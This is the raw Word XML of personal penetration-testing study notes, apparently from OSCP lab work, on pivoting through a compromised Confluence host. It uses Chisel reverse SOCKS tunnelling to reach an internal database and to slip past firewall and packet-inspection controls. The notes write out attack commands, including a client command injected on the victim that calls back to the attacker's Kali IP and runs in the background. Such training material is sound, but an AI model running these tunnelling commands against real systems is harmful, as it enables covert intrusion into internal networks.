      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Chisel client (CONFLUENCE01) will then decapsulate it and push it wherever it is addressed (in this case, it would be pushing it to PGDATABASE01, which is the target machine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1335"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we are working with SOCKS Proxy, that means we can access any port on Target Machine, since it's like we are running commands from CONFLUENCE01 (Chisel Client), which can access any port on PGDATABASE01 directly</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IMPORTANT NOTE TO MYSELF about</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse port forwarding for Chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="861"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inbound HTTP doesn't need to be allowed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — as long as CONFLUENCE01 can initiate one outbound HTTP connection to your Kali box, Chisel reverse port forwarding will work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="861"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All data going from Kali to the internal target is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tunneled through that outbound HTTP stream </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— so it evades both the inbound firewall and DPI restrictions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="861"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Even the initial chisel tunnel initiation doesn't require any in-bound traffic, only outbound since the client connects to the server and that's it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="861"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There might be a two-way TCP handshake, but that "in-bound traffic" is allowed since it's a response to an outbound packet. Inbound packets that are related to outbound packets in that way are allowed through firewall</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The traffic between the Chisel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is all </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP-formatted</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means we can traverse the deep packet inspection solution regardless of the contents of each HTTP packet. The Chisel server on our Kali machine will listen on TCP port 1080, a SOCKS proxy port. All traffic sent to that port will be passed back up the HTTP tunnel to the Chisel client, where it will be forwarded wherever it's addressed.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eqd9aoud521j" w:id="88"/>
      <w:bookmarkEnd w:id="88"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting Chisel to our Kali and CONFLUENCE01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Let's get the Chisel server up and running on our Kali machine. In the usage guide, we find the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--reverse</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Starting the Chisel server with this flag will mean that when the client connects, a S</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OCKS proxy port will be bound on the server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (our kali)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we start the server, we should </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">copy the Chisel client binary to CONFLUENCE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The Chisel server and client are run from the same binary, they're just initialized with either server or client as the first argument.</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> If our target host is running a different operating system or architecture, we have to download and use the compiled binary for that specific operating system and architecture from the Chisel Github releases page.</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t xml:space="preserve">In this case, both CONFLUENCE01 and our Kali machine are amd64 Linux machines. That means we can try to run the same chisel binary we have on our Kali machine on CONFLUENCE01.</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Here, they opened an APACHE Server on our Kali, and then used a payload on CONFLUENCE01 to download the Chisel binary hosted in our apache server. But, you can do the regular python hosting instead.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jkh9cv7ts8c1" w:id="89"/>
      <w:bookmarkEnd w:id="89"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Chisel</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t xml:space="preserve">Now that we have the Chisel binary on both our Kali machine and the target, we can run them. On the Kali machine, we'll start the binary as a server with the server subcommand, along with the bind port (--port) and the --reverse flag to allow the reverse port forward.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1219200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="548" name="image544.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image544.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel server --port 8080 --reverse</w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Chisel server starts up and confirms that it is listening on port 8080 and has reverse tunneling enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A14">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we try to run the Chisel client, we'll run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our Kali machine to log incoming traffic. We'll start the capture filtering to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp port 8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to only capture traffic on TCP port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="812800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="474" name="image454.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image454.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId211"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1177"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -nvvvXi tun0 tcp port 8080</w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll try to start the Chisel client using the injection, applying the server address and the port forwarding configuration options on the command line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A19">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We want to connect to the server running on our Kali machine (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.118.4:8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), creating a reverse SOCKS tunnel (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R:socks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> prefix specifies a reverse tunnel using a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy (which is bound to port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default). The remaining shell redirections (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; /dev/null 2&gt;&amp;1 &amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) force the process to run in the background, so our injection does not hang waiting for the process to finish.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A1A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel client 192.168.118.4:8080 R:socks &gt; /dev/null 2&gt;&amp;1 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the command we want CONFLUENCE01 to run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will connect CONFLUENCE01 (Chisel Client) to our Kali (Chisel Server)</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Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="834"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another chisel client syntax I've seen is this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="834"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel.exe client 192.168.119.5:8080 R:80:172.16.6.241:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A21">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="834"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 27.4.2. Services and Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A22">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="834"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although this is chisel.exe so maybe syntax is different</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="834"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an example of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">single reverse port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, not dynamic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="834"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll create a reverse port forward with the syntax </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R:localport:remotehost:remoteport</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In our case, the remote host and port are 172.16.6.241 and 80. The local port we want to utilize is 80.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="834"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the local IP is implicit here, since we didn't include it, so it defaults to 127.0.0.1. If we wanted explicit, it would be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="834"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel.exe client 192.168.119.5:8080 R:127.0.0.1:80:172.16.6.241:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A27">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you go back to your chisel server command, you should see that our Chisel server has logged an inbound connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A28">
      <w:pPr>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1625600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="249" name="image256.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image256.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel server --port 8080 --reverse</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Now, we can check the status of our SOCKS proxy with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss</w:t>
      </w:r>
